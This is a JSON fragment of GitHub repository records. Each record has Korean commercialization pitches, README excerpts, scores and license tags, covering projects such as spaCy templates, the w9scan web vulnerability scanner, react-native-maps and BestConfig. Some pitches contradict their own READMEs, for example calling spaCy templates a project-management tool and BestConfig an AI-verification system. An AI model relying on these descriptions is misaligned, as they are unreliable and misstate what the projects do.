complexities associated with extracting digital artifacts\nfrom volatile memory samples and provide a platform for further work into\nthis exciting area of research.\n\nThe Volatility distribution is available from: \nhttp://www.volat","composite_score":0.4151,"license_safety_tag":"restricted"},{"name":"explosion/projects","github_url":"https://github.com/explosion/projects","stars":10,"language":"Python","license":"MIT","abandonment_months":20,"description":"# explosion/projects 보물 분석\n\n## 왜 보물인가\n프로젝트 관리와 협업을 자동화할 수 있는 오픈소스 도구로, 기업들이 업무 효율을 높이는 데 직접 활용하거나 이를 기반으로 유료 서비스를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 이 기술을 개선해 중소기업용 프로젝트 관리 플랫폼으로 구독 서비스화\n- **내부","readme_excerpt":"<a href=\"https://explosion.ai\"><img src=\"https://explosion.ai/assets/img/logo.svg\" width=\"125\" height=\"125\" align=\"right\" /></a>\n\n# 🪐 Project Templates\n\n[Weasel](https://github.com/explosion/weasel), previously\n[spaCy projects](https://spacy.io/usage/projects), lets you manage and share\n**end-to-end workflows** for different **use cases and domains**, and\norchestrate training, packaging and serving your custom pipelines. You can start\noff by cloning a pre-defined project template, adjust it to fit your needs, load\nin your data, train a pipeline, export it as a Python package, upload your\noutputs to a remote storage and share your results with your team.\n\n> ⚠️ Weasel project templates require\n> [**Weasel**](https://github.com/explosion/weasel), which is also included by\n> default with spaCy v3.7+. You can install it from pip with\n> `pip install weasel` or conda with `conda install weasel -c conda-forge`. Make\n> sure to use a fresh virtual environment.\n>\n> See the [`master` branch](https","composite_score":0.415,"license_safety_tag":"safe"},{"name":"boy-hack/w9scan","github_url":"https://github.com/boy-hack/w9scan","stars":5,"language":"Python","license":"GPL-2.0","abandonment_months":82,"description":"# boy-hack/w9scan 분석 보고서\n\n## 왜 보물인가\n웹사이트의 보안 문제를 자동으로 찾아주는 도구로, 중소 기업들이 비싼 보안 전문가를 고용하지 않고도 자체적으로 해킹 위험을 점검할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹사이트 보안 진단 SaaS**\n- 중소 쇼핑몰, 블로그 등이 월 구독으로 자동 보안 검사를 받는 서비스\n\n**","readme_excerpt":"## w9scan\n> 一款全能型的网站漏洞扫描器，借鉴了各位前辈的优秀代码。内置1200+插件可对网站进行一次规模的检测，功能包括但不限于web指纹检测、端口指纹检测、网站结构分析、各种流行的漏洞检测、爬虫以及SQL注入检测、XSS检测等等，w9scan会自动生成精美HTML格式结果报告。  \n\n[![Python 2.7](https://img.shields.io/badge/python-2.7-yellow.svg)](https://www.python.org/)  [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://github.com/boy-hack/w9scan/blob/master/GPL-2.0)\n\n#### 目标\n- Linux/Windos通用\n- Python 2 不额外安装第三方库\n- 做开源扫描器中的 Top1\n- 先让软件work起来，再来优化各种细节\n- [版本升级记录](./UPDATELOG.MD)\n\n### Useage\n- `python w9scan.py --update` 更新程序\n- `python w9scan.py --guide` 向导模式启动w9scan\n- `python w9scan.py -u \"https://x.hacking8.com\" ` 快速扫描网站\n- `python w9scan.py -u \"https://blog.hacking8.com/\" -p emlog` 指定插件扫描网站\n- `python w9scan.py -u \"@1.txt\" -p emlog` 指定插件批量扫描网站\n- `python w9scan.py -s emlog` 搜索插件是否存在\n- `--banner` 输出banner\n- `--debug` 输出调试信息  \n\n[![asciicast](https://asciinema.org/a/4WhO54hcf43fySjxJOLyjczSm.png)](https://asciinema.org/a/4WhO54hcf43fySjxJOLyjczSm)\n\n#### TIPS\n- 本人并不崇尚命令行哲学，对于这个是能简则简\n- 直接使用`python ","composite_score":0.4149,"license_safety_tag":"restricted"},{"name":"vuejs/vuejs.org","github_url":"https://github.com/vuejs/vuejs.org","stars":5,"language":"JavaScript","license":"mit","abandonment_months":23,"description":"# vuejs/vuejs.org 저장소 분석\n\n## 왜 보물인가\nVue.js는 세계에서 가장 인기 있는 웹 개발 도구 중 하나로, 이 공식 문서 저장소는 수백만 개발자가 참고하는 핵심 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Vue.js 학습 플랫폼 - 초보자부터 전문가까지 체계적으로 배울 수 있는 온라인 강좌\n2. **내부 업","readme_excerpt":"﻿# v2.vuejs.org\n\n> Important: This repository is for Vue 1.x and 2.x only. Issues and pull requests related to 3.x are managed in the [v3 doc repo](https://github.com/vuejs/docs-next).\n\nThis site is built with [hexo](http://hexo.io/). Site content is written in Markdown format located in `src`. Pull requests welcome!\n\n## Writing\n\nSee the [Vue Docs Writing Guide](https://github.com/vuejs/v2.vuejs.org/blob/master/writing-guide.md) for our rules and recommendations on writing and maintaining documentation.\n\n## Developing\n\n``` bash\n$ npm install\n$ npm start # dev server at http://localhost:4000\n```\n\n## Deploying\n\nThe site is automatically deployed when commits land in `master`, via [Netlify](https://www.netlify.com/).\n\nIf you are the maintainer of a community translation fork and would like to deploy via Netlify instead of GitHub pages, please ping @yyx990803 in an issue to request a Netlify team membership and DNS update.\n\n## On Translations\n\nTranslations for this documentation project ar","composite_score":0.4148,"license_safety_tag":"safe"},{"name":"opsnull/follow-me-install-kubernetes-cluster","github_url":"https://github.com/opsnull/follow-me-install-kubernetes-cluster","stars":5,"language":"Shell","license":"NOASSERTION","abandonment_months":50,"description":"# opsnull/follow-me-install-kubernetes-cluster 평가\n\n## 왜 보물인가\n복잡한 서버 관리 시스템을 누구나 따라 할 수 있도록 단계별로 친절하게 설명한 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 교육 플랫폼**: 개발팀 신입사원 교육 또는 온라인 강좌로 구독료 수익화\n2. **기업 컨설팅 서비스**: 시스","readme_excerpt":"# 和我一步步部署 kubernetes 集群\n\n![dashboard-home](./images/dashboard-home.png)\n\n本系列文档介绍使用二进制部署 `kubernetes v1.16.6` 集群的所有步骤（Hard-Way 模式）。\n\n在部署的过程中，将详细列出各组件的启动参数，它们的含义和可能遇到的问题。\n\n部署完成后，你将理解系统各组件的交互原理，进而能快速解决实际问题。\n\n所以本文档主要适合于那些有一定 kubernetes 基础，想通过一步步部署的方式来学习和了解系统配置、运行原理的人。\n\n本系列系文档适用于 `CentOS 7` 及以上版本系统，**随着各组件的更新而更新**，有任何问题欢迎提 issue！\n\n由于启用了 `x509` 证书双向认证、`RBAC` 授权等严格的安全机制，建议**从头开始部署**，否则可能会认证、授权等失败！\n\n从 v1.16.x 版本开始，本文档做了如下调整：\n1. 容器运行时：用 containerd 替换 docker，更加简单、健壮；相应的命令行工具为 crictl；\n2. Pod 网络：用 calico 替换 flannel 实现 Pod 互通，支持更大规模的集群；\n\n新增指标监控系统：使用主流的 Prometheus、Grafana 技术栈实现集群指标采集和监控；\n\n如果想继续使用 docker 和 flannel，请参考附件文档。\n\n## 历史版本\n\n+ [v1.6.2](https://github.com/opsnull/follow-me-install-kubernetes-cluster/tree/v1.6.2)：已停止更新；\n+ [v1.8.x](https://github.com/opsnull/follow-me-install-kubernetes-cluster/tree/v1.8.x)：已停止更新；\n+ [v1.10.x](https://github.com/opsnull/follow-me-install-kubernetes-cluster/tree/v1.10.x)：已停止更新；\n+ [v1.12.x](https://github.com/opsnull/follow-me-install-kubernetes-cluster/tree/v1.12.","composite_score":0.4147,"license_safety_tag":"unknown"},{"name":"fossasia/pslab-desktop-apps","github_url":"https://github.com/fossasia/pslab-desktop-apps","stars":11,"language":"JavaScript","license":"GPL-3.0","abandonment_months":28,"description":"# PSLab Desktop Apps 상용화 분석\n\n## 왜 보물인가\n과학 실험실이나 교육 현장에서 값비싼 측정 장비 없이도 컴퓨터로 전자 실험을 할 수 있는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 과학 교육 플랫폼에 통합되어 학생들이 웹브라우저에서 바로 가상 실험을 진행하는 서비스\n2. **내부 업무 도구*","readme_excerpt":"# PSLab Desktop\n\nDesktop application for the [Pocket Science Lab (PSlab)](https://pslab.io) open hardware platform.\n\nDevelopment [![Build Status](\nhttps://github.com/fossasia/pslab-desktop/workflows/Build/release/badge.svg)](\nhttps://github.com/fossasia/pslab-desktop/actions)\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/pslab-fossasia)\n[![Gitter](https://badges.gitter.im/fossasia/pslab.svg)](https://gitter.im/fossasia/pslab?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Twitter Follow](https://img.shields.io/twitter/follow/pslabio.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/pslabio)\n\nThis repository holds the PSLab Desktop application. It is using [ElectronJS](https://www.electronjs.org) running [React](https://reactjs.org/) on top as UI renderer and uses Python scripts under the hood for device communication. The goal of PSLab is to create an Open Source ha","composite_score":0.4146,"license_safety_tag":"restricted"},{"name":"airbnb/react-native-maps","github_url":"https://github.com/airbnb/react-native-maps","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":2,"description":"# React Native Maps 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱에서 지도 기능을 쉽게 추가할 수 있게 해주는 핵심 도구로, 배달앱·여행앱·부동산앱 같은 위치 기반 서비스를 만드는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 배달 앱 플랫폼 (SaaS)**\n음식 배달, 택시, 퀵 서비스 기업들이 고객과 기사의 위치를 실시간으로 보여","readme_excerpt":"# react-native-maps [![npm version](https://img.shields.io/npm/v/react-native-maps.svg?style=flat)](https://www.npmjs.com/package/react-native-maps)\n\nReact Native Map components for iOS + Android\n\n## Contributing\n\nThis project is being maintained by a small group of people, and any help with issues and pull requests are always appreciated. If you are able and willing to contribute, please read the [guidelines](./CONTRIBUTING.md).\n\n## Installation\n\nSee [Installation Instructions](docs/installation.md).\n\nSee [Setup Instructions for the Included Example Project](docs/examples-setup.md).\n\n## Compatibility\n\n## React Native Compatibility\n\n### Version Requirements:\n\n## Compatibility\n\n### Fabric (New Architecture)\n\n| Version          | React Native Requirement |\n| ---------------- | ------------------------ |\n| 1.26.1+          | >= 0.81.1                |\n| 1.26.0 and below | >= 0.76                  |\n\n### Old Architecture\n\n| Version         | React Native Requirement |\n| --------------- | -","composite_score":0.4144,"license_safety_tag":"safe"},{"name":"vondear/RxTools","github_url":"https://github.com/vondear/RxTools","stars":22,"language":"Kotlin","license":"apache-2.0","abandonment_months":34,"description":"# RxTools 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 반복적으로 작성하는 복잡한 코드를 미리 만들어진 도구로 대체해서 개발 시간을 대폭 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 앱 개발자들을 위한 온라인 코드 생성 플랫폼으로, 원하는 기능을 선택하면 자동으로 코드를 만들어주는 웹 서비스\n- **내부 ","readme_excerpt":"# [RxTool](https://tamsiree.com/RxTool/)\n\n[![tamsiree.com](https://img.shields.io/badge/%E6%8A%80%E6%9C%AF%E5%8D%9A%E5%AE%A2-Tamsiree-brightgreen.svg)](https://tamsiree.com/)  [![Stars](https://badgen.net/github/stars/tamsiree/RxTool)](https://ghbtns.com/github-btn.html?user=tamsiree&repo=rxtool&type=star)  [![RxTool](https://jitpack.io/v/tamsiree/RxTool.svg)](https://jitpack.io/#tamsiree/RxTool)  \n\n[![996.icu](https://img.shields.io/badge/link-996.icu-red.svg)](https://996.icu)  [![LICENSE](https://img.shields.io/badge/license-Anti%20996-blue.svg)](https://github.com/996icu/996.ICU/blob/master/LICENSE)  [![](https://img.shields.io/badge/platform-android-brightgreen.svg)](https://developer.android.com/index.html)  [![API](https://img.shields.io/badge/API-21%2B-blue.svg?style=flat)](https://android-arsenal.com/api?level=21)  [![Gradle-5.6.4](https://img.shields.io/badge/Gradle-5.6.4-brightgreen.svg)](https://img.shields.io/badge/Gradle-5.6.4-brightgreen.svg)\n  \n![image](https://cdn.jsde","composite_score":0.4144,"license_safety_tag":"safe"},{"name":"react-community/react-native-maps","github_url":"https://github.com/react-community/react-native-maps","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":2,"description":"# react-native-maps 상용화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 지도 기능을 쉽게 추가할 수 있게 해주는 도구로, 배달앱·택시앱·부동산앱 등 위치 기반 서비스가 필요한 모든 앱 개발에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n배달 플랫폼, 택시 호출 앱, 실시간 위치 추적 서비스 등 지도 기능이 핵심인 구독","readme_excerpt":"# react-native-maps [![npm version](https://img.shields.io/npm/v/react-native-maps.svg?style=flat)](https://www.npmjs.com/package/react-native-maps)\n\nReact Native Map components for iOS + Android\n\n## Contributing\n\nThis project is being maintained by a small group of people, and any help with issues and pull requests are always appreciated. If you are able and willing to contribute, please read the [guidelines](./CONTRIBUTING.md).\n\n## Installation\n\nSee [Installation Instructions](docs/installation.md).\n\nSee [Setup Instructions for the Included Example Project](docs/examples-setup.md).\n\n## Compatibility\n\n## React Native Compatibility\n\n### Version Requirements:\n\n## Compatibility\n\n### Fabric (New Architecture)\n\n| Version          | React Native Requirement |\n| ---------------- | ------------------------ |\n| 1.26.1+          | >= 0.81.1                |\n| 1.26.0 and below | >= 0.76                  |\n\n### Old Architecture\n\n| Version         | React Native Requirement |\n| --------------- | -","composite_score":0.4143,"license_safety_tag":"safe"},{"name":"CosmWasm/cw-template","github_url":"https://github.com/CosmWasm/cw-template","stars":299,"language":"Rust","license":"Apache-2.0","abandonment_months":16,"description":"","readme_excerpt":"","composite_score":0.4143,"license_safety_tag":"safe"},{"name":"chai2010/ugo-compiler-book","github_url":"https://github.com/chai2010/ugo-compiler-book","stars":12,"language":"Go","license":"unknown","abandonment_months":20,"description":"# chai2010/ugo-compiler-book 분석\n\n## 왜 보물인가\n프로그래밍 언어를 만드는 방법을 단계별로 배울 수 있는 교과서 같은 자료로, 기술 교육 시장과 개발자 도구 시장의 니즈를 동시에 충족할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 프로그래밍 언어 설계 과정을 체계적으로 배우는 온라인 강의나 부트캠프 ","readme_excerpt":"# 《µGo语言实现——从头开发一个迷你语言编译器》\n\n- *凹语言(专为 WebAssembly 设计): https://github.com/wa-lang/wa*\n- *WaBook(Go语言实现的MD电子书构建工具): https://github.com/wa-lang/wabook*\n\n----\n\n本书尝试以实现 µGo 编译器为线索，以边学习边完善的自举方式实现一个玩具语言。\n\n![](cover.svg)\n\n- 在线阅读(Go版本): https://wa-lang.github.io/ugo-compiler-book/\n- 示例代码(Go版本): [https://github.com/wa-lang/ugo](https://github.com/wa-lang/ugo) (和章节对应的分支)\n- µGo 输出C语言: https://github.com/3dgen/ugo-c-book\n- 社区分享: [Go编译器定制简介](https://wa-lang.org/ugo-compiler-book/go-compiler-intro.html)\n\n---\n\n## Why: 挖坑的起因\n\n- 因为坑就在那里\n- 挖坑的工具差不多齐全了\n- 为了启动 [凹语言](https://github.com/wa-lang/wa) 的热身项目\n- 凹语言项目已过5年, 完成了当初不做玩具车的目标, 是时候向凹语言迁移了\n- ？\n\n## What: µGo 例子\n\nµGo 最初是Go语言的子集, 也是凹语言项目的起点. 所以说µGo现在更像是凹语言的子集, 当然µGo是一个玩具语言.\n\n```go\nimport \"libc\"\nimport \"libc.math\" => m\n\nconst Pi = 3.14\nconst Pi_2 = Pi * 2\n\ntype MyInt :int\n\nglobal x = println(1 + 2*(3+4) + -10 + double(50))\n\nfunc println() => int\n\nfunc main => int {}\n```\n\n## Output: 输出的目标格式\n\n为了跨平台和方便测试，输出LLVM汇编代码，如果以后可能会增加WASM文件。\n\n## License 版权\n\n学习目的可免费阅读。\n","composite_score":0.4141,"license_safety_tag":"unknown"},{"name":"ricequant/rqalpha-mod-vnpy","github_url":"https://github.com/ricequant/rqalpha-mod-vnpy","stars":8,"language":"Python","license":"apache-2.0","abandonment_months":58,"description":"# ricequant/rqalpha-mod-vnpy 분석\n\n## 왜 보물인가\n주식 자동매매 시스템을 누구나 쉽게 만들 수 있도록 도와주는 플랫폼으로, 금융 기술 업계에서 필수적인 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **자동매매 SaaS**: 일반 개인 투자자들이 자신의 매매 전략을 등록하고 자동으로 실행하게 해주는 구독 서비스\n2. **증권사 내","readme_excerpt":"# rqalpha-mod-vnpy\nRQAlpha 对接 vnpy 的扩展 Mod。通过启用该 Mod 来实现期货策略的实盘交易。目前本模块仍处在正式发布前的测试阶段，您可以下载参与测试并开 Issue 提交 bug，也欢迎您提交代码，参与开发。  \n\n***本开源模块未进行详尽完备的测试，作者不保证您通过本模块获取到数据的完整以及准确性、不保证您的策略逻辑正确触发对应的实盘操作，您通过使用本模块实盘操作产生的损益与作者无关。***\n\n***当前版本的 rqalpha-mod-vnpy 仅支持 VN.PY 的最新版本，请您及时更新 VN.PY 的代码***\n\n## 环境要求\n由于 VN.PY 项目仅支持 Linux 和 Windows 系统，python2.7 环境，目前本模块也仅支持在 Linux 或 Windows 系统下 python2.7 环境。  \n作者仅在 ubuntu 16.04 LTS 系统进行了测试。关于 Windows 及其他 Linux 发行版下的兼容性，作者会在精力允许的情况进行测试，也欢迎您将兼容性情况反馈给我。\n\n\n## 编译和安装\n\n本模块依赖 RQAlpha 和 VN.PY 两个项目，所以需要完成两个项目的安装。\n\n### 安装 RQAlpha\n rqalpha-mod-vnpy 依赖 2.0.X 版本的 RQAlpha，您可以执行如下命令来安装 RQAlpha\n \n ```\n pip install -U rqalpha\n ```\n\n### 安装 VN.PY\n VN.PY 项目未提供 pip 安装包，所以您只能通过下载源代码自行编译的方式进行安装。详细的环境配置和安装说明您可以查看 [VN.PY官方教程](http://www.vnpy.org/pages/tutorial.html) 。\n \n### 安装 mod\n在您完成 RQAlpha 的安装之后，您可以执行以下命令来安装 mod：\n\n```\nrqalpha mod install vnpy\n```\n之后您可以执行以下命令来启动 mod:\n\n```\nrqalpha mod enable vnpy\n```\n如果您需要关闭或者卸载 mod 您可以执行以下两条命令:\n\n```\nrqalpha mod disable vnpy\n\nrqalpha mod uninstall vnpy\n","composite_score":0.4138,"license_safety_tag":"safe"},{"name":"Bilibili/flv.js","github_url":"https://github.com/Bilibili/flv.js","stars":12,"language":"JavaScript","license":"apache-2.0","abandonment_months":23,"description":"# Bilibili/flv.js 상용화 분석\n\n## 왜 보물인가\n동영상 플랫폼에서 필수적인 영상 재생 기술을 제공하므로, 스트리밍 서비스를 만들려는 누구나 필요로 하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개인 방송 플랫폼, 온라인 교육 동영상 서비스, 기업용 영상 회의 솔루션\n- **내부 업무 도구**: 회사 영상 자산","readme_excerpt":"\nflv.js  [![npm](https://img.shields.io/npm/v/flv.js.svg?style=flat)](https://www.npmjs.com/package/flv.js)\n======\nAn HTML5 Flash Video (FLV) Player written in pure JavaScript without Flash. LONG LIVE FLV!\n\nThis project relies on [Media Source Extensions][] to work.\n\n**For FLV live stream playback, please consider [mpegts.js][] which is under active development.**\n\n**This project will become rarely maintained.**\n\n[mpegts.js]: https://github.com/xqq/mpegts.js\n## Overview\nflv.js works by transmuxing FLV file stream into ISO BMFF (Fragmented MP4) segments, followed by feeding mp4 segments into an HTML5 `<video>` element through [Media Source Extensions][] API.\n\n[Media Source Extensions]: https://w3c.github.io/media-source/\n\n## Demo\n[http://bilibili.github.io/flv.js/demo/](http://bilibili.github.io/flv.js/demo/)\n\n## Features\n- FLV container with H.264 + AAC / MP3 codec playback\n- Multipart segmented video playback\n- HTTP FLV low latency live stream playback\n- FLV over WebSocket live stream","composite_score":0.4137,"license_safety_tag":"safe"},{"name":"opencamp-cn/Rust-Basic","github_url":"https://github.com/opencamp-cn/Rust-Basic","stars":14,"language":"Rust","license":"MIT","abandonment_months":16,"description":"","readme_excerpt":"","composite_score":0.4134,"license_safety_tag":"safe"},{"name":"zhuyuqing/bestconf","github_url":"https://github.com/zhuyuqing/bestconf","stars":7,"language":"Java","license":"apache-2.0","abandonment_months":52,"description":"# BestConf 저장소 분석\n\n## 왜 보물인가\n인공지능 시스템이 실제로 올바르게 작동하는지 자동으로 검증해주는 기술로, AI 신뢰성 문제를 해결하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 품질 검증 SaaS**: 기업들이 자신의 AI 모델을 배포하기 전에 결과의 정확성을 자동으로 테스트하는 온라인 서비스\n2. **금융사 내부 도구*","readme_excerpt":"\r\n\r\nBetter Configurations for Large-Scale Systems (BestConfig)\r\n====================================\r\n\r\n[Documentation](http://bestconfig.readthedocs.io) | [QuickStart](http://bestconfig.readthedocs.io/en/master/source/how%20to%20apply/index_howtoapply.html) | [Use cases](http://bestconfig.readthedocs.io/en/master/source/examples/index_usecase.html) | [FAQ](http://bestconfig.readthedocs.io/en/master/source/faq/index_faq.html) \r\n\r\n***BestConfig*** is a system for automatically ***finding a best configuration setting within a resource limit*** for a deployed system under a given application workload. BestConfig is designed with an extensible architecture to automate the configuration tuning ***for general systems***.\r\n\r\nCurrently, Bestconfig has been tested on the following systems. It has also been applied to the Huawei Cloud+ applications.\r\n>>***1. Spark*** **(large-scale data processing engine)**\r\n    \r\n>>***2. Hadoop*** **(distributed processing framework for big data)**\r\n    \r\n>>***","composite_score":0.4133,"license_safety_tag":"safe"},{"name":"youtube/api-samples","github_url":"https://github.com/youtube/api-samples","stars":6,"language":"Java","license":"unknown","abandonment_months":24,"description":"# YouTube API 샘플 코드 분석 보고서\n\n## 왜 보물인가\n유튜브 동영상을 자동으로 관리하고 분석할 수 있는 공식 도구 모음으로, 유튜브와 연동된 서비스를 만드는 데 필수적인 기초 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 유튜브 채널 관리 자동화 플랫폼 (영상 업로드, 통계 분석 자동화)\n2. **내부 업무 도구**: ","readme_excerpt":"api-samples\n===========\n\nCode samples for YouTube APIs, including the YouTube Data API, YouTube Analytics API, and YouTube Live Streaming API. The repo contains language-specific directories that contain the samples.\n","composite_score":0.4132,"license_safety_tag":"unknown"},{"name":"Laverna/laverna","github_url":"https://github.com/Laverna/laverna","stars":6,"language":"JavaScript","license":"mpl-2.0","abandonment_months":61,"description":"# Laverna 저장소 분석\n\n## 왜 보물인가\n온라인 연결 없이도 개인의 메모와 할일을 안전하게 저장할 수 있는 노트 앱으로, 개인정보 보호를 중시하는 사용자들에게 매력적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인용 메모 앱을 구독 서비스로 제공 (월 $4.99~)\n2. **내부 업무 도구**: 기업의 민감한 정보를 오프라인으","readme_excerpt":"# Laverna - note taking web app\n\n[![Join the chat at https://gitter.im/Laverna/laverna](https://badges.gitter.im/Laverna/laverna.svg)](https://gitter.im/Laverna/laverna?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n[![Build Status](https://travis-ci.org/Laverna/laverna.svg?branch=dev)](https://travis-ci.org/Laverna/laverna) [![devDependency Status](https://david-dm.org/Laverna/laverna/dev-status.svg)](https://david-dm.org/Laverna/laverna#info=devDependencies) [![Code Climate](https://codeclimate.com/github/Laverna/laverna/badges/gpa.svg)](https://codeclimate.com/github/Laverna/laverna)\n\nLaverna is a JavaScript note-taking web application with a Markdown editor and encryption support.  It's built to be an open source alternative to Evernote.\n\nThe application stores all your notes in your browser databases such as indexedDB or localStorage, which is good for security reasons, because only you have access to them.\n\n**Demo**: https://laverna.cc/ OR http://lave","composite_score":0.4132,"license_safety_tag":"unknown"},{"name":"menzi11/BullshitGenerator","github_url":"https://github.com/menzi11/BullshitGenerator","stars":27,"language":"JavaScript","license":"NOASSERTION","abandonment_months":59,"description":"","readme_excerpt":"# 狗屁不通文章生成器\n# BullshitGenerator\n\n偶尔需要一些中文文字用于GUI开发时测试文本渲染. __本项目只做这一项, 请勿用于其他任何用途__.\nNeeds to generate some texts to test if my GUI rendering codes good or not. so I made this.\n\n## 再次声明一下, 本项目生成的文章真的狗屁不通, 只能拿来搞笑, 请不要用于正规用途!\n## 再次声明一下, 本项目生成的文章真的狗屁不通, 只能拿来搞笑, 请不要用于正规用途!\n## 再次声明一下, 本项目生成的文章真的狗屁不通, 只能拿来搞笑, 请不要用于正规用途!\n\n本项目为python3版本, 还有由suulnnka修改在线版, 使用更加方便:\nhttps://suulnnka.github.io/BullshitGenerator/index.html\n\n下一步计划:\n1. 防止文章过于内容重复\n1. 加入更多啰嗦话.\n1. 加入马三立<开会迷>里的内容\n1. 加入手写体直接渲染出图片的功能(__仅仅用于测试本人的打印机是否工作正常, 请勿做它用__).\n\n----\n\n## 关于Pull requests:\n\n鄙人每个requests都会仔细阅读, 但因近期事情较多, merge未必及时, 毕竟是业余项目, 请大家见谅. 如果未来实在更新不及时, 也欢迎有志之士替代本人继续本项目.\n\n## 关于中文变量名:\n\n平时撸码鄙人是不写中文变量名的, 本项目中的中文变量名只是最开始瞎写的时候边写语料边写代码时懒得切英文输入法了. 不过既然如此就保持吧!\n\n## 关于生成算法\n\n鄙人才疏学浅并不会任何自然语言处理相关算法. 而且目前比较偏爱简单有效的方式达到目的方式. 除非撞到了天花板, 否则暂时不会引入任何神经网络等算法. 不过欢迎任何人另开分支实现更复杂, 效果更好的算法. 不过除非效果拔群, 否则鄙人暂时不会融合.\n","composite_score":0.4131,"license_safety_tag":"unknown"},{"name":"opencamp-cn/Rustlings","github_url":"https://github.com/opencamp-cn/Rustlings","stars":20,"language":"Rust","license":"MIT","abandonment_months":16,"description":"","readme_excerpt":"","composite_score":0.413,"license_safety_tag":"safe"},{"name":"devonfw-forge/devonfw4flutter","github_url":"https://github.com/devonfw-forge/devonfw4flutter","stars":7,"language":"TeX","license":"unknown","abandonment_months":35,"description":"# devonfw4flutter 분석 보고서\n\n## 왜 보물인가\nFlutter(스마트폰 앱 개발 도구)를 쉽게 배우고 사용할 수 있도록 정리된 가이드 모음으로, 개발자들이 앱 만드는 시간을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 모바일 앱 개발 교육 플랫폼**: 중소 IT회사들이 직원 교육용으로 이 자료를 기반한 온라인 강좌를 판매","readme_excerpt":"![Banner](https://github.com/devonfw-forge/devonfw4flutter/wiki//images/banner.png)\n\n> The guide is published in the [Wiki of this repository](https://github.com/devonfw-forge/devonfw4flutter/wiki). This repository just holds a copy of the Wiki to make the commit history more readable. The _README.md_ is a copy of the [introduction chapter](https://github.com/devonfw-forge/devonfw4flutter/wiki).\n\n# Introduction\nPage Table of Contents\n- [Introduction](#introduction)\n  - [The Goal of this Guide](#the-goal-of-this-guide)\n  - [Who is this Guide for?](#who-is-this-guide-for)\n  - [Topics that will be Covered](#topics-that-will-be-covered)\n  - [Creation Context](#creation-context)\n  - [Structure](#structure)\n  - [My Sources](#my-sources)\n  - [Creation Process](#creation-process)\n\n## The Goal of this Guide\n\nThis guide aims to bridge the gap between the absolute Flutter [\\[1\\]](https://flutter.dev/) basics and clean, structured Flutter development. It should bring you from the basics of knowing","composite_score":0.4129,"license_safety_tag":"unknown"},{"name":"remacs/remacs","github_url":"https://github.com/remacs/remacs","stars":7,"language":"Emacs Lisp","license":"GPL-3.0","abandonment_months":62,"description":"# Remacs 저장소 분석\n\n## 왜 보물인가\nEmacs(글쓰기와 프로그래밍을 위한 오래된 텍스트 편집기)를 현대적인 프로그래밍 언어로 다시 만든 프로젝트로, 기존 사용자들이 더 빠르고 안정적인 경험을 할 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n1. **개발자용 온라인 편집기 SaaS**: 브라우저에서 바로 코드를 작성하고 실행하는 유료 서비스\n2.","readme_excerpt":"# Rust :heart: Emacs\n\nThis project isn't maintained anymore. If you are looking for a rust based emacs fork, you can take a look at [emacs-ng](https://github.com/emacs-ng/emacs-ng). However this fork is not about replacing the C code base, but to provide additional features using the rich ecosystem of rust.\n\n\n[![Join the chat at https://gitter.im/remacs-discuss/Lobby](https://badges.gitter.im/remacs-discuss/Lobby.svg)](https://gitter.im/remacs-discuss/Lobby?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Build Status](https://travis-ci.org/remacs/remacs.svg?branch=master)](https://travis-ci.org/remacs/remacs)\n\nA community-driven port of [Emacs](https://www.gnu.org/software/emacs/) to [Rust](https://www.rust-lang.org).\n\n<!-- markdown-toc start - Don't edit this section. Run M-x markdown-toc-refresh-toc -->\n**Table of Contents**\n\n- [Why Emacs?](#why-emacs)\n- [Why Rust?](#why-rust)\n- [Why A Fork?](#why-a-fork)\n- [Getting Started](#getting-started)\n    - [Requ","composite_score":0.4124,"license_safety_tag":"restricted"},{"name":"QUIC-Tracker/quic-tracker","github_url":"https://github.com/QUIC-Tracker/quic-tracker","stars":12,"language":"Go","license":"AGPL-3.0","abandonment_months":34,"description":"# QUIC-Tracker 보물 분석\n\n## 왜 보물인가\n인터넷 통신 속도를 검증하는 기술로, 점점 중요해지는 QUIC 프로토콜의 정상 작동을 자동으로 확인해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **인터넷 서비스 제공자(ISP) 모니터링 SaaS**: 통신사가 고객에게 제공하는 네트워크 품질 검사 서비스로 월 구독료 징수\n2. **CDN 회사 ","readme_excerpt":"A test suite for QUIC\n=====================\n\n.. image:: https://godoc.org/github.com/QUIC-Tracker/quic-tracker?status.svg\n    :target: https://godoc.org/github.com/QUIC-Tracker/quic-tracker\n    :alt: Documentation status\n\n\nThe test suite comprises a minimal Go implementation of QUIC which is\ncurrently draft-29 and TLS-1.3 compatible, as well as several\ntest scenarii built upon this implementation. The test suite outputs its\nresult as JSON files, which contains the result, the decrypted packets\nexchanged, as well as a pcap file and exporter secrets.\n\nInstallation\n------------\n\nYou should have Go 